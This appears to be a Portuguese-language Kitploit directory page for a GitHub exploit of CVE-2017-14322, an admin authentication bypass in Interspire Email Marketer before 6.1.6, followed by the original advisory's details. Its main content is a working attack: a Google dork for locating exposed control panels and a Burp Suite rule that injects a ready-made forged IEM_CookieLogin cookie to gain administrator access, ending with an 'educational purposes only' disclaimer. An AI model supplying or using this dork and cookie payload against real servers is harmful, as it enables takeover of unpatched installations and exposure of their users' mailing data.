Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit | Kitploit
Ferramentas/GitHubGitHub/joesmithjaffa/cve-2017-14322
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

Ver Repositório
51há 8 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-14322 Exploit do Interspire Email Marketer (emailmarketer)

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

Exploração usando Burp Suite

Adicione uma correspondência e substituição para o cabeçalho da Requisição como abaixo:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

Ao abrir o site, não funcionará na primeira vez, pois o cabeçalho Cookie não está presente. Atualize o site pela segunda vez usando o proxy do Burp com a regra acima adicionada; você verá o que desejava. Certifique-se de marcar "Intercept Client Requests"

Título:

Interspire Email Marketer - Bypass Remoto de Autenticação de Administrador

Autor:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

Informações de Risco:

Pontuação Base CVSS: 9.8 Vetor CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Cronograma:

2017-09-12 Vulnerabilidade descoberta 2017-09-12 Descoberto que o fornecedor já a corrigiu, mas nunca comunicou aos clientes, deixando centenas vulneráveis ​​em produção 2017-10-17 Divulgação pública

Produtos Afetados:

Interspire Email Marketer anterior à versão 6.1.6

Página do Fornecedor:

http://www.interspire.com/emailmarketer/

Detalhes:

A função responsável por verificar se o usuário já está logado no init.php do Interspire Email Marketer (IEM) anterior à versão 6.1.6 permite que atacantes remotos contornem a autenticação e obtenham acesso administrativo usando o cookie IEM_CookieLogin com um valor especialmente criado. Além disso, se o cliente não tiver um plano de manutenção anual, o aplicativo informa que está na última versão disponível e que não há atualização.

As vulnerabilidades foram encontradas durante uma resposta a incidentes em uma instância comprometida do aplicativo.

Prova de Conceito:

Detalhes fornecidos aqui: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

Correção:

O fornecedor corrigiu a vulnerabilidade na versão 6.1.6, mas nunca comunicou especificamente sobre isso a seus clientes.

Nota:

Este exploit é apenas para fins educacionais e não me responsabilizo por suas próprias ações.

Baixar ferramenta